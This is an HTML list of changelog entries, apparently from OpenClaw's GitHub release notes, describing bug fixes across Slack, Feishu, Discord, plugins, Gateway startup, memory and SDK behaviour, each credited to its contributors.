<li>Active Memory: clarify the deprecated <code>modelFallbackPolicy</code> warning and config help so <code>modelFallback</code> is described as a chain-resolution last resort, not runtime failover. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353454562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74602/hovercard" href="https://github.com/openclaw/openclaw/pull/74602">#74602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>Channels/Discord: keep read-only allowlist/default-target accessors from resolving SecretRef-backed bot tokens, so status and channel summaries no longer fail when tokens are only available in gateway runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354779461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74737/hovercard" href="https://github.com/openclaw/openclaw/pull/74737">#74737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Gateway/sessions: align session abort wait semantics across <code>chat</code>, <code>agent</code>, and <code>sessions</code> server methods so abort RPCs return after the targeted sessions actually halt instead of resolving early while runs are still draining. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354883943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74751/hovercard" href="https://github.com/openclaw/openclaw/pull/74751">#74751</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/output: drop copied inbound metadata-only assistant replay turns before provider replay instead of synthesizing a placeholder, so Telegram and other channels cannot receive <code>[assistant copied inbound metadata omitted]</code> as model output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354851470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74745" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74745/hovercard" href="https://github.com/openclaw/openclaw/issues/74745">#74745</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adamwdear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adamwdear">@adamwdear</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Doctor/memory: suppress skipped embedding-readiness warnings for key-optional providers such as Ollama and LM Studio while preserving timeout and not-ready diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353533459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74608/hovercard" href="https://github.com/openclaw/openclaw/issues/74608">#74608</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347037109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73882/hovercard" href="https://github.com/openclaw/openclaw/issues/73882">#73882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Channels/groups: preserve observe-only turn suppression for prepared dispatch paths and restore deprecated channel turn runtime aliases, so passive observer/group flows stay silent while older plugins keep compiling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu: skip empty-text messages (e.g. <code>{"text":""}</code>) that carry no media, so no blank user turn is written to the session and downstream LLM providers cannot reject the request with "messages must not be empty". (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353876867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74634" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74634/hovercard" href="https://github.com/openclaw/openclaw/issues/74634">#74634</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xdengli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xdengli">@xdengli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Feishu/Bitable: clean up newly created placeholder rows whose fields contain only default empty values while preserving meaningful link, attachment, user, number, boolean, and location values during create-app cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347281559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73920" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73920/hovercard" href="https://github.com/openclaw/openclaw/pull/73920">#73920</a>) Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043329694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40602/hovercard" href="https://github.com/openclaw/openclaw/pull/40602">#40602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boat2moon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boat2moon">@boat2moon</a>.</li>
<li>macOS app: keep attach-only mode and the Debug Settings launchd toggle marker-only, so launching with <code>--attach-only</code>/<code>--no-launchd</code> no longer uninstalls the Gateway LaunchAgent or drops active sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330918206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72174" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72174/hovercard" href="https://github.com/openclaw/openclaw/pull/72174">#72174</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DolencLuka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DolencLuka">@DolencLuka</a>.</li>
<li>macOS Canvas: stop auto-reloading the current A2UI host during push/eval/snapshot flows, so pushed A2UI content remains visible instead of returning to the empty Canvas shell. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341063728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73337/hovercard" href="https://github.com/openclaw/openclaw/issues/73337">#73337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gr4via/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gr4via">@Gr4via</a>.</li>
<li>Plugin SDK: restore the deprecated <code>plugin-sdk/zalouser</code> command-auth facade so published Lark/Zalo plugins that import it load on current hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354621148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74702/hovercard" href="https://github.com/openclaw/openclaw/issues/74702">#74702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Goron01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Goron01">@Goron01</a>.</li>
<li>Plugins/runtime-deps: include bundled provider plugins when <code>models.providers</code>, auth profiles, agent defaults, or subagent model refs configure that provider, while keeping inactive default-enabled provider plugins out of doctor repair. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350160379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74307/hovercard" href="https://github.com/openclaw/openclaw/issues/74307">#74307</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Skeptomenos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Skeptomenos">@Skeptomenos</a>.</li>
<li>Plugins/runtime: resolve relative plugin <code>api.resolvePath</code> inputs against the plugin root instead of the host working directory, while keeping absolute and home paths user-resolved. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354673479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74718/hovercard" href="https://github.com/openclaw/openclaw/pull/74718">#74718</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimdawdy-hub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimdawdy-hub">@jimdawdy-hub</a>.</li>
<li>Plugins/runtime-deps: refresh mirrored root chunks through a temporary file before replacing the active copy, so failed refreshes do not delete chunks that running plugin imports still need. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: prefer <code>require</code> conditional exports when building staged dependency aliases, so CommonJS-only plugin runtime deps such as <code>ws</code> do not resolve to ESM wrappers under Jiti. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352876135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74547/hovercard" href="https://github.com/openclaw/openclaw/issues/74547">#74547</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aderius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aderius">@aderius</a>.</li>
<li>Bonjour/Gateway: cap flapping advertiser restarts in a sliding window, so mDNS probing/name-conflict loops disable discovery instead of churning indefinitely on constrained hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349224957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74242/hovercard" href="https://github.com/openclaw/openclaw/pull/74242">#74242</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ndj888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ndj888">@ndj888</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/runtime-deps: verify staged package entry files before reusing mirrored runtime roots, so browser-control repairs incomplete <code>ajv</code>/MCP SDK installs after update instead of failing after restart on a missing <code>ajv/dist/ajv.js</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spickeringlr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spickeringlr">@spickeringlr</a>.</li>
<li>Heartbeat: resolve <code>responsePrefix</code> template variables with the selected provider, model, and thinking context before delivering alerts or suppressing prefixed <code>HEARTBEAT_OK</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057207695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43064/hovercard" href="https://github.com/openclaw/openclaw/issues/43064">#43064</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057211022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43065" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43065/hovercard" href="https://github.com/openclaw/openclaw/pull/43065">#43065</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077564180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46858/hovercard" href="https://github.com/openclaw/openclaw/pull/46858">#46858</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yweiii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yweiii">@yweiii</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JunJD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JunJD">@JunJD</a>.</li>
<li>Memory/LanceDB: show full memory UUIDs in the <code>memory_forget</code> candidate list so agents can pass the displayed ID back to targeted deletion without hitting the full-UUID validator. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265695758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66913" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66913/hovercard" href="https://github.com/openclaw/openclaw/pull/66913">#66913</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>.</li>
<li>File-transfer plugin: require canonical read-path preflight authorization for <code>file.fetch</code>, fail closed when <code>dir.fetch</code> preflight entries are missing, absolute, or traversing, and recheck returned archive entries before handing archive bytes to callers. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348342550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74134" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74134/hovercard" href="https://github.com/openclaw/openclaw/pull/74134">#74134</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Channels/Feishu: retry file-typed iOS video resource downloads as <code>media</code> after a Feishu/Lark HTTP 502 and preserve the original 502 when the fallback also fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095635032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49855/hovercard" href="https://github.com/openclaw/openclaw/issues/49855">#49855</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098933775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50164/hovercard" href="https://github.com/openclaw/openclaw/pull/50164">#50164</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347465827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73986/hovercard" href="https://github.com/openclaw/openclaw/pull/73986">#73986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Providers/Amazon Bedrock: expose the full Claude Opus 4.7 thinking profile (<code>xhigh</code>, <code>adaptive</code>, and <code>max</code>) for Bedrock model refs, while keeping Opus/Sonnet 4.6 on adaptive-by-default, so <code>/think</code> menus and validation match the Anthropic transport behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354600083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74701" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74701/hovercard" href="https://github.com/openclaw/openclaw/issues/74701">#74701</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sparkleHazard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sparkleHazard">@sparkleHazard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/tokenjuice: compile the bundled plugin against tokenjuice 0.7.0's published OpenClaw host types instead of a local compatibility shim, so package contract drift fails in OpenClaw validation before release. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OAuth/secrets: ignore root-level Google OAuth <code>client_secret_*.json</code> downloads so local client-secret files do not appear as commit candidates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354413662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74689" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74689/hovercard" href="https://github.com/openclaw/openclaw/pull/74689">#74689</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeongdulee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeongdulee">@jeongdulee</a>.</li>
<li>Memory: mirror <code>sqlite-vec</code> into packaged bundled-plugin runtime deps for the default memory plugin, so builtin vector search does not lose its SQLite extension after upgrading to 2026.4.27. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354441000" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74692" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74692/hovercard" href="https://github.com/openclaw/openclaw/issues/74692">#74692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mozi1924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mozi1924">@mozi1924</a>.</li>
<li>Gateway/startup: bound local discovery advertisement during startup, so a stuck discovery plugin can no longer keep the Gateway from reaching ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346875416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73865/hovercard" href="https://github.com/openclaw/openclaw/issues/73865">#73865</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>Gateway/models: serve the last successful model catalog while stale reloads refresh in the background, so Gateway control-plane and OpenAI-compatible requests no longer block behind model-provider rediscovery after model config changes. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348343209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74135" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74135/hovercard" href="https://github.com/openclaw/openclaw/issues/74135">#74135</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>CLI/status: resolve read-only channel setup runtime fallback from the packaged OpenClaw dist root, so <code>status --all</code>, <code>status --deep</code>, channel, and doctor paths do not crash when an external channel plugin needs setup metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354478427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74693" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74693/hovercard" href="https://github.com/openclaw/openclaw/issues/74693">#74693</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>SDK/events: keep per-run SDK event streams from surfacing duplicate raw chat projection frames, while normalizing chat-only projection frames and preserving raw access through <code>rawEvents</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354625879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74704/hovercard" href="https://github.com/openclaw/openclaw/issues/74704">#74704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>SDK: report Gateway terminal <code>agent.wait</code> timeout snapshots with lifecycle metadata as <code>timed_out</code> while keeping bare wait deadlines non-terminal. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawsweeper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawsweeper">@clawsweeper</a>.</li>
<li>Google Meet: block managed Chrome intro/test speech until browser health proves the participant is in-call, and expose <code>speechReady</code> diagnostics so login, admission, permission, and audio-bridge blockers no longer look like successful speech. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Slack/commands: keep native command argument menus on select controls for encoded choice values up to Slack's option limit and truncate fallback button labels to Slack's button-text limit, so long valid choices no longer render invalid Slack blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Agents/Codex: flush accepted debounced steering messages before normal app-server turn cleanup, so inbound follow-ups acknowledged as queued are not dropped when the turn completes before the debounce fires. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/interactive replies: keep rendered buttons and selects within Slack Block Kit value and count limits, and align command argument select values with Slack's option limit, so overlong agent-authored choices no longer make Slack reject the whole block payload. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/interactive replies: drop overlong Block Kit button URLs while preserving valid callback values, so malformed link buttons no longer make Slack reject the whole interactive reply. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: truncate native command argument-menu confirmation text to Slack's dialog limit, so long plugin arg names no longer make fallback buttons render invalid Block Kit payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval metadata context to Slack's element and text limits, so large approval details no longer make Slack reject the approval card. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval update fallback text to Slack's message limit while preserving the rendered approval blocks, so long commands no longer make resolved or expired approval cards stay stale after <code>chat.update</code> rejects <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: cap native command argument-menu fallback rows to Slack's message block limit, so large plugin choice lists no longer make Slack reject the generated menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: drop fallback command argument buttons whose encoded values exceed Slack's button-value limit, so one oversized plugin choice no longer makes Slack reject the whole menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: merge message-tool presentation and interactive blocks on Slack sends, so buttons and selects are no longer dropped when a structured message body is also present. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text to Slack's send limit while preserving the rendered blocks, so long context fallbacks no longer make rich Slack messages fail with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
